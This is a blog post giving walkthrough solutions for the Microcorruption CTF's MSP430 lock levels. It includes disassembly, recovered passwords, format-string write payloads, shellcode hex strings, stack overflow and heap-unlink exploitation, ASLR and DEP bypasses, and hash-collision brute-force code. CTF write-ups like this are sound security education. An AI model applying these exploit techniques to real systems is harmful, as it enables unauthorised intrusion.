The pony barn

Microcorruption CTF levels
Posted on September 16, 2014

I see that others have posted their writeups for microcorruption.org, so here are all of the answers I came up with. I’d like to hear about more interesting solutions or mistakes. I hope this helps you if you’re stuck.

New Orleans

This is a simple “find the password” level, this is how the password is checked:

44bc <check_password>
44bc:  0e43           clr	r14
44be:  0d4f           mov	r15, r13
44c0:  0d5e           add	r14, r13
44c2:  ee9d 0024      cmp.b	@r13, 0x2400(r14)
44c6:  0520           jne	#0x44d2 <check_password+0x16>
44c8:  1e53           inc	r14
44ca:  3e92           cmp	#0x8, r14
44cc:  f823           jne	#0x44be <check_password+0x2>
44ce:  1f43           mov	#0x1, r15
44d0:  3041           ret
44d2:  0f43           clr	r15
44d4:  3041           ret

Where the password is stored at 0x2400 by another procedure on startup. This translates roughly to:

char *secret_pass = ",0-}YX1"; // 0x2400, generated earlier

uint16_t check_pass(const char const *p){
	uint16_t o = 0;
	do {
		if(*(p + o) != *(secret_pass + o))
			return 0;
	} while (++o != 0x8);
	return 1;
}

Sydney

Very similar to the last; it checks two bytes at time against static values.

448a <check_password>
448a:  bf90 733a 0000 cmp	#0x3a73, 0x0(r15) // 
4490:  0d20           jnz	$+0x1c
4492:  bf90 7c7c 0200 cmp	#0x7c7c, 0x2(r15)
4498:  0920           jnz	$+0x14
449a:  bf90 3172 0400 cmp	#0x7231, 0x4(r15)
44a0:  0520           jne	#0x44ac <check_password+0x22>
44a2:  1e43           mov	#0x1, r14
44a4:  bf90 3426 0600 cmp	#0x2634, 0x6(r15)
44aa:  0124           jeq	#0x44ae <check_password+0x24>
44ac:  0e43           clr	r14
44ae:  0f4e           mov	r14, r15
44b0:  3041           ret

We can extract the password with a horrible one liner:

printf $(
	grep r15 | grep -o '#0x....' | tr -d '#0x' |
	paste -sd ''| perl -pe 's/(..)/\\x\1/g'
)

Hanoi

This one checks that the seventeenth byte of input is 0x11.

4552:  3f40 d344      mov	#0x44d3 "Testing if password is valid.", r15
4556:  b012 de45      call	#0x45de <puts>
455a:  f290 1100 1024 cmp.b	#0x11, &0x2410
4560:  0720           jne	#0x4570 <login+0x50>
4562:  3f40 f144      mov	#0x44f1 "Access granted.", r15
4566:  b012 de45      call	#0x45de <puts>

Thus an input of seventeen bytes of \x11 will open the lock.

Adiss Ababa

A format string bug, r11 points to the user supplied string:

447a:  0b12           push	r11
447c:  b012 c845      call	#0x45c8 <printf>
4480:  2153           incd	sp
4482:  3f40 0a00      mov	#0xa, r15
4486:  b012 5045      call	#0x4550 <putchar>
448a:  8193 0000      tst	0x0(sp)
448e:  0324           jz	#0x4496 <main+0x5e>
4490:  b012 da44      call	#0x44da <unlock_door>

This is easily exploited without DEP. The simplest value to write is already effectively a noop. In this case, 0x02 is translated to “rrc sr”.

We overwrite the jz at 0x448e with a value of 0x02 via “\x8e\x44%u%n” and the lock opens.

Cusco

The vulnerability

Our first code injection level; the bug is in the allocation sizes:

4500:  3150 f0ff      add	#0xfff0, sp
4504:  3f40 7c44      mov	#0x447c "Enter the password ...", r15
4508:  b012 a645      call	#0x45a6 <puts>
450c:  3f40 9c44      mov	#0x449c "Remember: passwords ...", r15
4510:  b012 a645      call	#0x45a6 <puts>
4514:  3e40 3000      mov	#0x30, r14
4518:  0f41           mov	sp, r15
451a:  b012 9645      call	#0x4596 <getsn>

Nowhere near enough stack space is allocated at 0x4500. Later on, 48 bytes of the users input are copied directly onto the stack. This overflows the buffer and overwrites the saved return address.

Our first shellcode

We’re allowed nulls here so this one is super simple:

mov #0xff00, sr
call #0x10

This is assembled to “324000ffb0121000” and is eight bytes long. Our exploit is therefore:

0343034303430343324000ffb0121000f643

Where “f643” is the little endian address of the shellcode on the stack and 0343 is a “noop”.

Reykjavik

This one is a bit dumb. Instead of trying to understand what it’s doing we can single step a few instructions from the request for input interrupt and see that it is checking for the magic value. Provide that value and the lock opens.

Montevideo

Another obvious buffer overflow, almost exactly the same as Cusco. This time the offending user input must pass through strcpy so we can’t have nulls.

We can take the easy route and return to a function that will open the lock for us, as we control not just the return value but the stack. That’s no fun though and we can shave a few bytes off our input size if we write some shellcode without nulls.

Shellcode without nulls

This uses two methods for getting nulls into addresses in order to fit a shellcode that doesn’t require any help from special addresses into sixteen bytes. This is important so that we can re-use it between levels without having to tweak it.

mov  #0xf010, r4
and  #0x0fff, r4
mov  #0xff01, sr
dec  sr
call r4

To get the call gate (0x0010) into r4, we simply mask it with an and instruction. We now have only eight bytes left and still need to make the call to r4, which leaves us with eight bytes. We use four bytes to copy 0xff01 to sr, then can decrement it once with two bytes and the final two bytes to make the call. This results in:

344010f034f0ff0f324001ff12838412

Simply appending the address of our shellcode results in an open lock in the minimum possible overflowed bytes.

Whitehorse

Nearly the same as Montevideo, just doesn’t use the strcpy, use exactly the same payload and adjust the return address.

Johannesburgh

Almost the same as Montevideo and Whitehorse, but they add a stack cookie. We are in luck though, cookie is static, only one byte is checked, and it isn’t a terminator.

So we simply use the same payload, append the cookie, then append the return address.

Santa cruz

On this level we are given two inputs: username and password.

They are copied onto the stack with strcpy like this:

[username][password]

There is no bounds checking on either, however, if the strlen() of password is greater than sixteen the program aborts.

The easiest way around this is to overflow the username. Supplying a valid length password will add the null terminator back in.

Jakarta

Much like Santa Cruz, but the length check is done before the strcpy. This means that we cannot use the strcpy trick Santa Cruz. There is, however, a single byte overflow in the length check:

4600:  7f90 2100      cmp.b	#0x21, r15

If you cause the length of the buffer mod 255 (0xff) to be less than 0x21, you may pick size you like.

Novosibirsk

Another format string vulnerability. Not much harder to exploit than the first. We’re probably meant to attain code execution here, however, there’s a lower hanging fruit. Simply overwrite the 0x7e here with 0x7f:

44b0 <conditional_unlock_door>
...
44c4:  0f12           push	r15
44c6:  3012 7e00      push	#0x7e
44ca:  b012 3645      call	#0x4536 <INT>

Algiers

Dynamic memory management is introduced here. I’ll assume a basic understanding of glibc implements malloc. This implementation is just a little simpler, there’s no prev_size in the chunk metadata.

Reconstruction of free implementation

In contrast to the glibc implementation, which includes a previous_size, these chunk descriptors appear to be:

typedef struct chunk_ { 
        struct chunk_ *prev;
        struct chunk_ *next;
        uint16_t size;
} chunk;

We will take control of one chunk during the overwrite (six bytes). Here is a translation of the free() function that we will target:

void free(void *p) 
{       
        // Mark this block free
        chunk *c = p - sizeof(chunk);
        c->size &= 0xfffe;
        
        if (!c->prev->size & 0x0001) {
                // If previous block is free, link the previous and next
                // together.
                c->prev->size = c->size + c->prev->size + sizeof(chunk);
                c->prev->next = c->next;
                c->next->prev = c->prev;
                c = c->prev;
        }
        if (!c->next->size & 0x0001) {
                // If the next block is free, link the one past that to us.
                c->size = c->next->size + c->size + sizeof(chunk);
                c->next = c->next->next;
                c->next->prev = c;
        };
}

We control the memory p points to. As such, we can overwrite c->prev, next and size. If we point prev to our own memory, we can write any two bytes wherever we like.

Any even number for size is considered free, any odd number is in use. We are targeting line 11 by controlling the prev pointer.

Line 12 needs to be taken account of; The address of c->prev will be written back over our overwrite, possibly clobbering more than we might expect.

Vladivostok

A straightforward ASLR level. There is a printf bug which allows us to leak an address. By comparing the data at that leaked address to the image before randomization, we find that it is the address of the printf function.

By calculating the offset from the leaked code to the _INT procedure to be 386 bytes, we can make the attack as follows:

Leak the pointer with “%x%x”
Add 386 bytes to this address
Use that address as the overwritten return value, adding a four byte buffer and then 0x7f as the function argument

Lagos

Our input is restricted to alphanumeric characters on this level. All we need to do is search for gadgets or whole functions within that range.

One is found pretty quickly, halfway into the getsn function:

4650 <getsn>
4650:  0e12           push	r14
4652:  0f12           push	r15
4654:  2312           push	#0x2
4656:  b012 fc45      call	#0x45fc <INT>
465a:  3150 0600      add	#0x6, sp
465e:  3041           ret

We return to 4654 and specify a maximum input size, write address and return address as 4242. This looks like:

AAAAAAAAAAAAAAAAA	TF	BBBB	BB
Irrelevant bytes	Ret	Args	Ret

Now another input will be requested, and will be returned to immediately after getsn.

Bangalore

This level introduces DEP, where a page is marked either executable or writeable, but never both. Our solution is almost the same as Lagos.

We simply replace the call to getsn with a call to mark_page_executable and then return to the stack, where our shellcode is now executable.

Chernobyl

This is a step up from Algiers (the last heap corruption level) in two ways:

Overwrites are less obviously deterministic due to the use of a hash map.
Before free() is called, malloc() is called. This means we can’t be as lazy and have to overwrite the link forwards with a valid free chunk.

Neither of these are a big deal.

The program has a bug whereby targeting one bucket causes a heap overflow. To target that bucket we want complete control of the hash generated for any input data.

Creating collisions

We don’t need exact collisions, but they’re easy enough and we’ll remove a variable whilst we’re at it. Exact collisions mean that we don’t have to fully understand the bucket offset calculation. For completeness’s sake, this is what the bucket offset code seems to do:

  inline uint16_t hash_to_offset(hash_table *table, uint16_t key_hash)
  {
          uint16_t os;
          uint16_t i;
          for (os = 2, i = table->no_buckets; i > 0; i--)
                  os += os;
          os -= 1; 
          os &= key_hash;
          os *= 2; 
  }

The key_hash passed in is generated via a simple hashing function:

// 'AAAA'  == 
// r0  acc == 07df
// r1  acc == fbe0
// r3  acc == 87ff
// fin acc == 7fc0 == 32704
uint16_t checksum(const char *key)
{
	uint16_t acc = 0;
	uint16_t v;
	while (*key != '\0') {
		v = *key;
		v += acc;
		acc = v;
		acc *= 32;
		acc -= v;
		key++;
	}
	return acc;
}

Haskell was used to generate dictionary words that would fit into any bucket:

main :: IO ()
main = collisions 0x0000 >>= print
  where
    collisions tgt = filter ((tgt ==) . hash) <$> candidates
    candidates = lines <$> readFile "/usr/share/dict/all"


hash :: String -> Word16
hash = go 0
  where
    go acc [] = acc
    go acc (x:xs) =
        let v = (fromIntegral . ord) x + acc in
            go (v * 32 - v) xs

Now we can easily use the QuickCheck library to generate pseudo-random padding for any string we wish to inject.

A simple heap overflow

It is now possible to perform an overwrite in free(), so long as we ensure that the forward link in the overwritten chunk is pointing to the end of the heap (a large free block). Failing to ensure this causes the malloc() call just prior to abort due to perceived heap exhaustion.

The malloc() function simply walks the circular list until it finds a free chunk of appropriate size, or until it finds that its next link is at a lower address. A lower address indicates that it has reached the join of the circle and thus the end of the list.

Hollywood

Initial information gathering

The disassembly of this level appears to be complete garbage due to the program jumping to an unusual offset which throws off the web based disassembler completely.

This limits us to tracing execution flow via only a few methods. We can watch the call gate at 0x10 and take note of registers set at these points, or step over hundreds or thousands of instructions at a time hoping not to miss something important. There is one last option we explore later: tracing execution step by step automatically.

Providing a non-winning input to this level executes over 280000 instructions, making a manual single-step method highly improbable to work.

MSP430 emulator

Reading and comprehending such an amount of deliberately confusing assembly is going to take us days and be extremely cumbersome.

With Hollywood playing dirty like this, we shall cheat a little by downloading a MSP430 emulator.

Local debugging

At this point, it’s easy to see what needs to be done. We need to define the programs interaction with it’s environment. There must be an interaction, but how do we find it?

Inspecting the emulator, we can see that the random number generation implementation is quite conveniently lacking entropy:

case 0x20:
	// RNG
	registers[15] = 0;
	break;

Given this, we can deduce that the input is read to the address 0x2600 each time on the emulated system. Unfortunately we can’t put a hardware read watchpoint on this due to the remote debugger interface coverage being minimal.

Time for a hatchet job:

set can-use-hw-watchpoints 0
break *0x10 if $r2 == 0x8200
c
watch ($r5 == 0x2604)
watch ($r6 == 0x2604)
watch ($r7 == 0x2604)
... so on
c

We start the emulator with an input of “AAAAAAAA”. Some time later gdb stops execution and we can see that it’s totally touching our bits, nice:

(gdb) i r r4
r4             0x8282	0x8282

Using the emulators trace capability and a MSP430 disassembler, we can trace execution and dig out the relevant algorithm (in AT&T syntax).

Here is a cleaned up version that is run in a loop over the input until a null is hit:

clr  r4
clr  r6
add  @r5,r4
swpb r4
xor @r5+, r6
xor r4, r6
xor r6, r4
xor r4, r6

Now, tracing access of r4 and r6, we see that they’re untouched until later, where they’re compared against magic values:

cmp	#-335,	r4	;#0xfeb1
push sp
cmp	#-28008,r6	;#0x9298
push sp

Setting these registers to the magic values via the debugger opens the lock.

It’s worth noting that I was also able to find this read loop by comparing the traces of two different input sizes. Due to the lack of randomization, the traces only differed at the point of one loop continuing further. At this point, the program with a shorter input immediately performed the cmp r4.

Creating a GDB script, we’re now able to run an input through the system and quickly see the results on r4 and r6. We have to use a bit of a dodgy hack to break on the cmp instruction, as the emulator appears to be a little buggy:

watch *(unsigned long*) $pc == 0xfeb19034

Using this feedback loop, we can quickly knock up an implementation of the checksum for reference:

hash :: String -> (Word16, Word16)
hash = algo 0 0 . map (swpb . makeWord) . chunksOf 2 . map (fromIntegral . ord)
  where
    makeWord (a:b:[]) = a * 0x100 + b
    makeWord (a:[])   = a * 0x100

algo :: Word16 -> Word16 -> [Word16] -> (Word16, Word16)
algo r4 r6 [] = (r6, r4)
algo r4 r6 (x:xs) =
    let r4' = swpb (x + r4)
        r6' = xor x r6
    in algo r6' r4'' xs

swpb :: Word16 -> Word16
swpb n = 
    let l = n .&. 0x00ff
        r = n .&. 0xff00
    in (l `shiftL` 8) .|. (r `shiftR` 8)

Having matched this up with the output, and proving that we can directly control either register via brute force, we must build a faster implementation to be able to control both within a reasonable time period.

A few minutes later, we have a alphanumeric string that creates the magic values in both r4 and r6 which triggers the lock. The alphanumeric restriction is for style and ease of handling only.

#include <stdio.h>
#include <time.h>
#include <stdlib.h>
#include <unistd.h>
#include <stdint.h>

#define SWAP(a,b) a ^= b; b ^= a; a ^= b;
#define SWPB(p)   SWAP((p)[0], (p)[1])
#define READ16(p) (p[0] * 0x100 + p[1])

static const char alphanum[] =
    "0123456789" "ABCDEFGHIJKLMNOPQRSTUVWXYZ" "abcdefghijklmnopqrstuvwxyz";

inline void hash(uint16_t * r4, uint16_t * r6, const char const *input);
inline void increment_attempt(char *attempt, size_t len);
inline void gen_random(char *s, const int len);

void main()
{
	srand(time(NULL));
	uint16_t r4, r6;
	char attempt[12];
	while (1) {
		gen_random(attempt, 12);
		hash(&r4, &r6, attempt);

		if (r4 == 0xfeb1 && r6 == 0x9298)
			printf("%2hx: %s\n", r6, attempt);
	}
}

inline void gen_random(char *s, const int len)
{

	int i;
	for (i = 0; i < len; ++i)
		s[i] = alphanum[rand() % (sizeof(alphanum) - 1)];
	s[len] = 0;
}

inline void hash(uint16_t * r4, uint16_t * r6, const char const *input)
{
	*r4 = 0;
	*r6 = 0;
	uint16_t const *p = (uint16_t *) input;
	do {
		if (*(char *)p == '\0' || *(char *)p + 1 == '\0')
			break;
		*r4 += *p;
		SWPB((uint8_t *) r4);
		*r6 ^= *p;
		SWAP(*r6, *r4);
	} while (p++);
}

“I am not ashamed to confess I am ignorant of what I do not know”

— Marcus Tullius Cicero